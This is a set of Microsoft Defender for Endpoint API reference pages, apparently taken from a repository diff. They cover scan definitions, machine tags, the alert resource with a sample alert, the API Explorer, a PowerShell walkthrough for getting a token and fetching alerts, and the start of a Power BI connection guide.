-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-scanType|Enum|The type of scan. Possible values are: "Windows", "Network". **Required**.
-scanName|String|Name of the scan. **Required**.
-isActive|Boolean|Status of whether the scan actively running. **Required**.
-target|String| A comma separated list of targets to scan, either IP addresses or hostnames. **Required**.
-intervalInHours|Int|The interval at which the scan runs. **Required**.
-targetType|String|The target type in the target field. Possible types are "IP Address" or "Hostname". Default value is IP Address. **Required**.
-scannerAgent|Object|machine Id. **Required**.
-scanAuthenticationParams|Object|An object representing the authentication parameters, see [Authentication parameters object properties](./get-authenticated-scan-properties.md#authentication-parameters-object-properties) for expected fields. This property is mandatory when creating a new scan and is optional when updating a scan.
-
-## Response
-
-If successful, this method returns 200 - Ok response code and the new or updated scan definition in the response body.
-
-## Example request to add a new scan
-
-Here's an example of a request that adds a new scan.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions
-```
-
-```json
- {
-"scanType": "Windows",
-"scanName": "Test Windows scan",
-"isActive": true,
-"target": "127.0.0.1",
-"intervalInHours": 1,
-"targetType": "Ip",
-"scannerAgent": {
- "machineId": "eb663a27ae9d032f61bc268a79eedf14c4b90f77",
-},
-"scanAuthenticationParams": {
- "@odata.type": "#microsoft.windowsDefenderATP.api.WindowsAuthParams",
- "type": "Kerberos",
- "username": "username",
- "domain": "password",
- "isGmsaUser": true
- }
-}
-```
-
-## Example response
-
-Here's an example of the response.
-
-```json
- {
-"@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#DeviceAuthenticatedScanDefinitions/$entity",
- "id": "289224fb-1686-472c-9751-5555960854ca",
- "scanType": "Windows",
- "scanName": "Test Windows scan",
- "isActive": true,
- "target": "127.0.0.1",
- "orgId": "0335a792-18d2-424b-aeed-559567054570",
- "intervalInHours": 1,
- "createdBy": "username@test.com",
- "targetType": "Ip",
- "scanAuthenticationParams": null,
- "scannerAgent": {
- "id": "0335a792-18d2-424b-aeed-559567054570_ eb663a27ae9d032f61bc268a79eedf14c4b90f77",
- "machineId": "eb663a27ae9d032f61bc268a79eedf14c4b90f77",
- "machineName": "DESKTOP-TEST",
- "lastSeen": "2023-01-04T09:40:03.2787058Z",
- "assignedApplicationId": "ae4a5cde-b4a1-4b76-8635-458b2cf15752",
- "scannerSoftwareVersion": "7.6.0.0",
- "lastCommandExecutionTimestamp": "2023-01-04T09:33:16Z",
- "mdeClientVersion": "10.8295.22621.1010"
- },
- "latestScan": {
- "status": null,
- "failureReason": null,
- "executionDateTime": null
- }
-
-}
-```
-
-## Example request to update a scan
-
-Here's an example of a request that updates a scan.
-
-```http
-PATCH https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/289224fb-1686-472c-9751-5555960854ca
-```
-
-```json
-{
-"scanName": "Test Update Windows scan",
-"isActive": false,
-"target": "127.0.0.2,127.0.0.3",
-"intervalInHours": 1,
-"targetType": "Ip",
-"scanAuthenticationParams": {
- "@odata.type": "#microsoft.windowsDefenderATP.api.WindowsAuthParams",
- "type": "Kerberos",
- "username": "username",
- "domain": "password",
- "isGmsaUser": true
- }
- }
-
-```
-
-## Response example
-
-Here's an example of the response.
-
-```json
-{
- "@odata.context": "https://localhost:1059/api/$metadata#DeviceAuthenticatedScanDefinitions/$entity",
- "id": "289224fb-1686-472c-9751-5555960854ca",
- "scanType": "Windows",
- "scanName": "Test Update Windows scan",
- "isActive": false,
- "target": "127.0.0.2,127.0.0.3",
- "orgId": "0335a792-18d2-424b-aeed-559567054570",
- "intervalInHours": 1,
- "createdBy": "userName@microsoft.com",
- "targetType": "Ip",
- "scanAuthenticationParams": null,
- "scannerAgent": {
- "id": "0335a792-18d2-424b-aeed-559567054570_eb663a27ae9d032f61bc268a79eedf14c4b90f77",
- "machineId": "eb663a27ae9d032f61bc268a79eedf14c4b90f77",
- "machineName": "DESKTOP-TEST",
- "lastSeen": "2023-01-04T09:40:03.2787058Z",
- "assignedApplicationId": "ae4a5cde-b4a1-4b76-8635-458b2cf15752",
- "scannerSoftwareVersion": "7.6.0.0",
- "lastCommandExecutionTimestamp": "2023-01-04T09:33:16Z",
- "mdeClientVersion": "10.8295.22621.1010"
- },
- "latestScan": {
- "status": null,
- "failureReason": null,
- "executionDateTime": null
- }
-}
-
-```
-
-## Example request to delete scans
-
-Here's an example of a request that deletes scans.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/BatchDelete
-```
-
-```json
-{
- "ScanDefinitionIds": ["td32f17af-5cc2-4e4e-964a-4c4ef7d216e2", "ab32g20af-5dd2-4a5e-954a-4c4ef7d216e2"],
-}
-```
security Add Or Remove Machine Tags https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/add-or-remove-machine-tags.md
- Title: Add or remove a tag for a machine
-description: Learn how to use the Add or Remove machine tags API to adds or remove a tag for a machine in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 02/24/2023--
-# Add or remove a tag for a machine
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Adds or removes a tag for a specific [Machine](machine.md).
-
-## Limitations
-
-1. You can post on machines last seen according to your configured retention period.
-
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Defender for Endpoint APIs](apis-intro.md).
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.ReadWrite|'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Manage security setting'. For more (See [Create and manage roles](../user-roles.md) for more information).
-> - The user needs to have access to the machine, based on machine group settings (See [Create and manage machine groups](../machine-groups.md) for more information).
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/{id}/tags
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-Value|String|The tag name. **Required**.
-Action|Enum|Add or Remove. Allowed values are: 'Add' or 'Remove'. **Required**.
-
-## Response
-
-If successful, this method returns 200 - Ok response code and the updated Machine in the response body.
-
-## Example Request
-
-Here is an example of a request that adds a machine tag.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/tags
-```
-
-```json
-{
- "Value" : "test Tag 2",
- "Action": "Add"
-}
-```
-
-To remove machine tag, set the Action to 'Remove' instead of 'Add' in the request body.
security Add Or Remove Multiple Machine Tags https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/add-or-remove-multiple-machine-tags.md
- Title: Add or remove a tag for multiple machines
-description: Learn how to use the Add or Remove machine tags API to add or remove a tag for multiple devices in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 02/24/2023--
-# Add or remove a tag for multiple machines
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Adds or removes a tag for the specified set of machines.
-
-## Limitations
-
-1. You can post on machines last seen according to your configured retention period.
-2. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
-3. We can add or remove a tag for up to 500 machines per API call.
--
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Defender for Endpoint APIs](apis-intro.md).
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.ReadWrite|'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Manage security setting'. For more information, see [Create and manage roles](../user-roles.md).
-> - The user needs to have access to the machine, based on machine group settings (See [Create and manage machine groups](../machine-groups.md) for more information).
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/AddOrRemoveTagForMultipleMachines
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-Value|String|The tag name. **Required**.
-Action|Enum|Add or Remove. Allowed values are: 'Add' or 'Remove'. **Required**.
-MachineIds|List (String)|List of machine IDs to update. Required.|
-
-## Response
-
-If successful, this method returns 200 - Ok response code and the updated machines in the response body.
-
-## Example Request
-
-Here's an example of a request that adds a tag to multiple machines.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/AddOrRemoveTagForMultipleMachines
-```
-
-```json
-{
- "Value" : "Tag",
- "Action": "Add",
- "MachineIds": ["34e83ca3feea4dae2353006ba389262c033a025e",
- "2a398439b4975924e87a65943972bc702469b329",
- "a610c00c65fdf79960cc0077d9d8c569d23f09a5"]
-}
-```
-
-To remove machine tags, set the Action to 'Remove' instead of 'Add' in the request body.
security Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/alerts.md
- Title: Get alerts API
-description: Learn about the methods and properties of the Alert resource type in Microsoft Defender for Endpoint.
------- m365-security-- tier1-- must-keep--- Previously updated : 12/18/2020--
-# Alert resource type
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> [!NOTE]
-> For the full available Alerts API experience across all Microsoft Defenders' products, visit: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## Methods
-
-|Method|Return Type|Description|
-||||
-|[Get alert](get-alert-info-by-id.md)|[Alert](alerts.md)|Get a single [alert](alerts.md) object|
-|[List alerts](get-alerts.md)|[Alert](alerts.md) collection|List [alert](alerts.md) collection|
-|[Update alert](update-alert.md)|[Alert](alerts.md)|Update specific [alert](alerts.md)|
-|[Batch update alerts](batch-update-alerts.md)||Update a batch of [alerts](alerts.md)|
-|[Create alert](create-alert-by-reference.md)|[Alert](alerts.md)|Create an alert based on event data obtained from [Advanced Hunting](run-advanced-query-api.md)|
-|[List related domains](get-alert-related-domain-info.md)|Domain collection|List URLs associated with the alert|
-|[List related files](get-alert-related-files-info.md)|[File](files.md) collection|List the [file](files.md) entities that are associated with the [alert](alerts.md)|
-|[List related IPs](get-alert-related-ip-info.md)|IP collection|List IPs that are associated with the alert|
-|[Get related machines](get-alert-related-machine-info.md)|[Machine](machine.md)|The [machine](machine.md) that is associated with the [alert](alerts.md)|
-|[Get related users](get-alert-related-user-info.md)|[User](user.md)|The [user](user.md) that is associated with the [alert](alerts.md)|
-
-## Properties
-
-|Property|Type|Description|
-||||
-|ID|String|Alert ID.|
-|title|String|Alert title.|
-|description|String|Alert description.|
-|alertCreationTime|Nullable DateTimeOffset|The date and time (in UTC) the alert was created.|
-|lastEventTime|Nullable DateTimeOffset|The last occurrence of the event that triggered the alert on the same device.|
-|firstEventTime|Nullable DateTimeOffset|The first occurrence of the event that triggered the alert on that device.|
-|lastUpdateTime|Nullable DateTimeOffset|The date and time (in UTC) the alert was last updated.|
-|resolvedTime|Nullable DateTimeOffset|The date and time in which the status of the alert was changed to *Resolved*.|
-|incidentId|Nullable Long|The [Incident](../view-incidents-queue.md) ID of the Alert.|
-|investigationId|Nullable Long|The [Investigation](../automated-investigations.md) ID related to the Alert.|
-|investigationState|Nullable Enum|The current state of the [Investigation](../automated-investigations.md). Possible values are: *Unknown*, *Terminated*, *SuccessfullyRemediated*, *Benign*, *Failed*, *PartiallyRemediated*, *Running*, *PendingApproval*, *PendingResource*, *PartiallyInvestigated*, *TerminatedByUser*, *TerminatedBySystem*, *Queued*, *InnerFailure*, *PreexistingAlert*, *UnsupportedOs*, *UnsupportedAlertType*, *SuppressedAlert*.|
-|assignedTo|String|Owner of the alert.|
-|rbacGroupName|String|Role-based access control device group name.|
-|mitreTechniques|String|Mitre Enterprise technique ID.|
-|relatedUser|String|Details of user related to a specific alert.|
-|severity|Enum|Severity of the alert. Possible values are: *UnSpecified*, *Informational*, *Low*, *Medium*, and *High*.|
-|status|Enum|Specifies the current status of the alert. Possible values are: *Unknown*, *New*, *InProgress* and *Resolved*.|
-|classification|Nullable Enum|Specification of the alert. Possible values are: `TruePositive`, `Informational, expected activity`, and `FalsePositive`.|
-|determination|Nullable Enum|Specifies the determination of the alert. <p>Possible determination values for each classification are: <br><li> <b>True positive</b>: `Multistage attack` (MultiStagedAttack), `Malicious user activity` (MaliciousUserActivity), `Compromised account` (CompromisedUser) ΓÇô consider changing the enum name in public API accordingly, `Malware` (Malware), `Phishing` (Phishing), `Unwanted software` (UnwantedSoftware), and `Other` (Other). <li> <b>Informational, expected activity:</b> `Security test` (SecurityTesting), `Line-of-business application` (LineOfBusinessApplication), `Confirmed activity` (ConfirmedUserActivity) - consider changing the enum name in public API accordingly, and `Other` (Other). <li> <b>False positive:</b> `Not malicious` (Clean) - consider changing the enum name in public API accordingly, `Not enough data to validate` (InsufficientData), and `Other` (Other).|
-|category|String|Category of the alert.|
-|detectionSource|String|Detection source.|
-|threatFamilyName|String|Threat family.|
-|threatName|String|Threat name.|
-|machineId|String|ID of a [machine](machine.md) entity that is associated with the alert.|
-|computerDnsName|String|[machine](machine.md) fully qualified name.|
-|aadTenantId|String|The Microsoft Entra ID.|
-|detectorId|String|The ID of the detector that triggered the alert.|
-|comments|List of Alert comments|Alert Comment object contains: comment string, createdBy string, and createTime date time.|
-|Evidence|List of Alert evidence|Evidence related to the alert. See the following example.|
-
-> [!NOTE]
-> Around August 29, 2022, previously supported alert determination values (*Apt* and *SecurityPersonnel*) will be deprecated and no longer available via the API.
-
-### Response example for getting single alert:
-
-```http
-GET https://api.securitycenter.microsoft.com/api/alerts/da637472900382838869_1364969609
-```
-
-```json
-{
- "id": "da637472900382838869_1364969609",
- "incidentId": 1126093,
- "investigationId": null,
- "assignedTo": null,
- "severity": "Low",
- "status": "New",
- "classification": null,
- "determination": null,
- "investigationState": "Queued",
- "detectionSource": "WindowsDefenderAtp",
- "detectorId": "17e10bbc-3a68-474a-8aad-faef14d43952",
- "category": "Execution",
- "threatFamilyName": null,
- "title": "Low-reputation arbitrary code executed by signed executable",
- "description": "Binaries signed by Microsoft can be used to run low-reputation arbitrary code. This technique hides the execution of malicious code within a trusted process. As a result, the trusted process might exhibit suspicious behaviors, such as opening a listening port or connecting to a command-and-control (C&C) server.",
- "alertCreationTime": "2021-01-26T20:33:57.7220239Z",
- "firstEventTime": "2021-01-26T20:31:32.9562661Z",
- "lastEventTime": "2021-01-26T20:31:33.0577322Z",
- "lastUpdateTime": "2021-01-26T20:33:59.2Z",
- "resolvedTime": null,
- "machineId": "111e6dd8c833c8a052ea231ec1b19adaf497b625",
- "computerDnsName": "temp123.middleeast.corp.microsoft.com",
- "rbacGroupName": "A",
- "aadTenantId": "a839b112-1253-6432-9bf6-94542403f21c",
- "threatName": null,
- "mitreTechniques": [
- "T1064",
- "T1085",
- "T1220"
- ],
- "relatedUser": {
- "userName": "temp123",
- "domainName": "DOMAIN"
- },
- "comments": [
- {
- "comment": "test comment for docs",
- "createdBy": "secop123@contoso.com",
- "createdTime": "2021-01-26T01:00:37.8404534Z"
- }
- ],
- "evidence": [
- {
- "entityType": "User",
- "evidenceCreationTime": "2021-01-26T20:33:58.42Z",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "parentProcessFileName": null,
- "parentProcessFilePath": null,
- "ipAddress": null,
- "url": null,
- "registryKey": null,
- "registryHive": null,
- "registryValueType": null,
- "registryValue": null,
- "accountName": "name",
- "domainName": "DOMAIN",
- "userSid": "S-1-5-21-11111607-1111760036-109187956-75141",
- "aadUserId": "11118379-2a59-1111-ac3c-a51eb4a3c627",
- "userPrincipalName": "temp123@microsoft.com",
- "detectionStatus": null
- },
- {
- "entityType": "Process",
- "evidenceCreationTime": "2021-01-26T20:33:58.6133333Z",
- "sha1": "ff836cfb1af40252bd2a2ea843032e99a5b262ed",
- "sha256": "a4752c71d81afd3d5865d24ddb11a6b0c615062fcc448d24050c2172d2cbccd6",
- "fileName": "rundll32.exe",
- "filePath": "C:\\Windows\\SysWOW64",
- "processId": 3276,
- "processCommandLine": "rundll32.exe c:\\temp\\suspicious.dll,RepeatAfterMe",
- "processCreationTime": "2021-01-26T20:31:32.9581596Z",
- "parentProcessId": 8420,
- "parentProcessCreationTime": "2021-01-26T20:31:32.9004163Z",
- "parentProcessFileName": "rundll32.exe",
- "parentProcessFilePath": "C:\\Windows\\System32",
- "ipAddress": null,
- "url": null,
- "registryKey": null,
- "registryHive": null,
- "registryValueType": null,
- "registryValue": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "detectionStatus": "Detected"
- },
- {
- "entityType": "File",
- "evidenceCreationTime": "2021-01-26T20:33:58.42Z",
- "sha1": "8563f95b2f8a284fc99da44500cd51a77c1ff36c",
- "sha256": "dc0ade0c95d6db98882bc8fa6707e64353cd6f7767ff48d6a81a6c2aef21c608",
- "fileName": "suspicious.dll",
- "filePath": "c:\\temp",
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "parentProcessFileName": null,
- "parentProcessFilePath": null,
- "ipAddress": null,
- "url": null,
- "registryKey": null,
- "registryHive": null,
- "registryValueType": null,
- "registryValue": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "detectionStatus": "Detected"
- }
- ]
-}
-```
-
-## Related articles
-
-[Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)
-
security Api Explorer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/api-explorer.md
- Title: API Explorer in Microsoft Defender for Endpoint-
-description: Use the API Explorer to construct and do API queries, test, and send requests for any available API
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# API Explorer
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-The Microsoft Defender for Endpoint API Explorer is a tool that helps you explore various Defender for Endpoint APIs interactively.
-
-The API Explorer makes it easy to construct and do API queries, test, and send requests for any available Defender for Endpoint API endpoint. Use the API Explorer to take actions or find data that might not yet be available through the user interface.
-
-The tool is useful during app development. It allows you to perform API queries that respect your user access settings, reducing the need to generate access tokens.
-
-You can also use the tool to explore the gallery of sample queries, copy result code samples, and generate debug information.
-
-With the API Explorer, you can:
--- Run requests for any method and see responses in real-time.-- Quickly browse through the API samples and learn what parameters they support.-- Make API calls with ease; no need to authenticate beyond the management portal signin.-
-## Access API Explorer
-
-From the left navigation menu, select **Partners & APIs** \> **[API Explorer](https://security.microsoft.com/interoperability/api-explorer)**.
-
-## Supported APIs
-
-API Explorer supports all the APIs offered by Defender for Endpoint.
-
-The list of supported APIs is available in the [APIs documentation](apis-intro.md).
-
-## Get started with the API Explorer
-
-1. In the left pane, there's a list of sample requests that you can use.
-2. Follow the links and click **Run query**.
-
-Some of the samples may require specifying a parameter in the URL, for example, {machine- ID}.
-
-## FAQ
-
-**Do I need to have an API token to use the API Explorer?** <br>
-Credentials to access an API aren't needed. The API Explorer uses the Defender for Endpoint management portal token whenever it makes a request.
-
-The logged-in user authentication credential is used to verify that the API Explorer is authorized to access data on your behalf.
-
-Specific API requests are limited based on your RBAC privileges. For example, a request to "Submit indicator" is limited to the security admin role.
security Api Hello World https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/api-hello-world.md
- Title: Hello World for Microsoft Defender for Endpoint API-
-description: Create a practice 'Hello world'-style API call to the Microsoft Defender for Endpoint API.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Microsoft Defender for Endpoint API - Hello World
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## Get Alerts using a simple PowerShell script
-
-### How long it takes to go through this example?
-
-It only takes 5 minutes done in two steps:
--- Application registration-- Use examples: only requires copy/paste of a short PowerShell script-
-### Do I need a permission to connect?
-
-For the Application registration stage, you must have a **Global administrator** role in your Microsoft Entra tenant.
-
-<a name='step-1create-an-app-in-azure-active-directory'></a>
-
-### Step 1 - Create an App in Microsoft Entra ID
-
-1. Log on to [Azure](https://portal.azure.com) with your **Global administrator** user.
-
-2. Navigate to **Microsoft Entra ID** \> **App registrations** \> **New registration**.
-
- :::image type="content" source="../media/atp-azure-new-app2.png" alt-text="The App registrations option under the Manage pane in the Microsoft Entra admin center" lightbox="../media/atp-azure-new-app2.png":::
-
-3. In the registration form, choose a name for your application and then click **Register**.
-
-4. Allow your Application to access Defender for Endpoint and assign it **'Read all alerts'** permission:
-
- - On your application page, click **API Permissions** \> **Add permission** \> **APIs my organization uses** > type **WindowsDefenderATP** and click on **WindowsDefenderATP**.
-
- > [!NOTE]
- > WindowsDefenderATP does not appear in the original list. You need to start writing its name in the text box to see it appear.
-
- :::image type="content" source="../media/add-permission.png" alt-text="The API permissions option under the Manage pane in the Microsoft Entra admin center" lightbox="../media/add-permission.png":::
-
- - Choose **Application permissions** \> **Alert.Read.All** > Click on **Add permissions**.
-
- :::image type="content" source="../media/application-permissions.png" alt-text="The permission type and settings panes in the Request API permissions page" lightbox="../media/application-permissions.png":::
-
- > [!IMPORTANT]
- > You need to select the relevant permissions. 'Read All Alerts' is only an example!
-
- For example:
-
- - To [run advanced queries](run-advanced-query-api.md), select 'Run advanced queries' permission.
- - To [isolate a machine](isolate-machine.md), select 'Isolate machine' permission.
- - To determine which permission you need, please look at the **Permissions** section in the API you are interested to call.
-
-5. Click **Grant consent**.
-
- > [!NOTE]
- > Every time you add permission, you must click on **Grant consent** for the new permission to take effect.
-
- :::image type="content" source="../media/grant-consent.png" alt-text="The grant permission consent option in the Microsoft Entra admin center" lightbox="../media/grant-consent.png":::
-
-6. Add a secret to the application.
-
- Click **Certificates & secrets**, add description to the secret and click **Add**.
-
- > [!IMPORTANT]
- > After click Add, **copy the generated secret value**. You won't be able to retrieve after you leave!
-
- :::image type="content" source="../media/webapp-create-key2.png" alt-text="The Certificates & secrets menu item in the Manage pane in the Microsoft Entra admin center" lightbox="../media/webapp-create-key2.png":::
-
-7. Write down your application ID and your tenant ID.
-
- On your application page, go to **Overview** and copy the following:
-
- :::image type="content" source="../media/app-and-tenant-ids.png" alt-text="The application details pane under the Overview menu item in the Microsoft Entra admin center" lightbox="../media/app-and-tenant-ids.png":::
-
-Done! You have successfully registered an application!
-
-### Step 2 - Get a token using the App and use this token to access the API.
--- Copy the script below to PowerShell ISE or to a text editor, and save it as **Get-Token.ps1**.-- Running this script will generate a token and will save it in the working folder under the name **Latest-token.txt**.-
- ```powershell
- # That code gets the App Context Token and save it to a file named "Latest-token.txt" under the current directory
- # Paste below your Tenant ID, App ID and App Secret (App key).
-
- $tenantId = '' ### Paste your tenant ID here
- $appId = '' ### Paste your Application ID here
- $appSecret = '' ### Paste your Application secret here
-
- $resourceAppIdUri = 'https://api.securitycenter.microsoft.com'
- $oAuthUri = "https://login.microsoftonline.com/$TenantId/oauth2/token"
- $authBody = [Ordered] @{
- resource = "$resourceAppIdUri"
- client_id = "$appId"
- client_secret = "$appSecret"
- grant_type = 'client_credentials'
- }
- $authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
- $token = $authResponse.access_token
- Out-File -FilePath "./Latest-token.txt" -InputObject $token
- return $token
- ```
--- Sanity Check:
- - Run the script.
- - In your browser go to: <https://jwt.ms/>.
- - Copy the token (the content of the Latest-token.txt file).
- - Paste in the top box.
- - Look for the "roles" section. Find the _Alert.Read.All_ role.
-
- :::image type="content" source="../media/api-jwt-ms.png" alt-text="The Decoded Token pane for jwt.ms" lightbox="../media/api-jwt-ms.png":::
-
-### Let's get the Alerts!
--- The script below will use **Get-Token.ps1** to access the API and will get the past 48 hours Alerts.-- Save this script in the same folder you saved the previous script **Get-Token.ps1**.-- The script creates two files (json and csv) with the data in the same folder as the scripts.-
- ```powershell
- # Returns Alerts created in the past 48 hours.
-
- $token = ./Get-Token.ps1 #run the script Get-Token.ps1 - make sure you are running this script from the same folder of Get-Token.ps1
-
- # Get Alert from the last 48 hours. Make sure you have alerts in that time frame.
- $dateTime = (Get-Date).ToUniversalTime().AddHours(-48).ToString("o")
-
- # The URL contains the type of query and the time filter we create above
- # Read more about [other query options and filters](get-alerts.md).
- $url = "https://api.securitycenter.microsoft.com/api/alerts?`$filter=alertCreationTime ge $dateTime"
-
- # Set the WebRequest headers
- $headers = @{
- 'Content-Type' = 'application/json'
- Accept = 'application/json'
- Authorization = "Bearer $token"
- }
-
- # Send the webrequest and get the results.
- $response = Invoke-WebRequest -Method Get -Uri $url -Headers $headers -ErrorAction Stop
-
- # Extract the alerts from the results.
- $alerts = ($response | ConvertFrom-Json).value | ConvertTo-Json
-
- # Get string with the execution time. We concatenate that string to the output file to avoid overwrite the file
- $dateTimeForFileName = Get-Date -Format o | foreach {$_ -replace ":", "."}
-
- # Save the result as json and as csv
- $outputJsonPath = "./Latest Alerts $dateTimeForFileName.json"
- $outputCsvPath = "./Latest Alerts $dateTimeForFileName.csv"
-
- Out-File -FilePath $outputJsonPath -InputObject $alerts
- ($alerts | ConvertFrom-Json) | Export-CSV $outputCsvPath -NoTypeInformation
- ```
-
-You're all done! You have just successfully:
--- Created and registered and application-- Granted permission for that application to read alerts-- Connected the API-- Used a PowerShell script to return alerts created in the past 48 hours-
-## Related topic
--- [Microsoft Defender for Endpoint APIs](exposed-apis-list.md)-- [Access Microsoft Defender for Endpoint with application context](exposed-apis-create-app-webapp.md)-- [Access Microsoft Defender for Endpoint with user context](exposed-apis-create-app-nativeapp.md)
security Api Power Bi https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/api-power-bi.md
- Title: Microsoft Defender for Endpoint APIs connection to Power BI-
-description: Create a Power Business Intelligence (BI) report on top of Microsoft Defender for Endpoint APIs.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Create custom reports using Power BI
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-In this section, you learn to create a Power BI report on top of Defender for Endpoint APIs.
-
-The first example demonstrates how to connect Power BI to Advanced Hunting API, and the second example demonstrates a connection to our OData APIs, such as Machine Actions or Alerts.
-
-## Connect Power BI to Advanced Hunting API
-
-1. Open Microsoft Power BI.
-
-2. Select **Get Data** \> **Blank Query**.
- :::image type="content" source="../media/power-bi-create-blank-query.png" alt-text="The Blank Query option under the Get Data menu item" lightbox="../media/power-bi-create-blank-query.png":::
-
-3. Select **Advanced Editor**.
- :::image type="content" source="../media/power-bi-open-advanced-editor.png" alt-text="The Advanced Editor menu item" lightbox="../media/power-bi-open-advanced-editor.png":::
-
-4. Copy the below and paste it in the editor:
-
- ```
- let
- AdvancedHuntingQuery = "DeviceEvents | where ActionType contains 'Anti' | limit 20",
-
- HuntingUrl = "https://api.securitycenter.microsoft.com/api/advancedqueries",
-
- Response = Json.Document(Web.Contents(HuntingUrl, [Query=[key=AdvancedHuntingQuery]])),
-
- TypeMap = #table(
- { "Type", "PowerBiType" },
- {
- { "Double", Double.Type },
- { "Int64", Int64.Type },
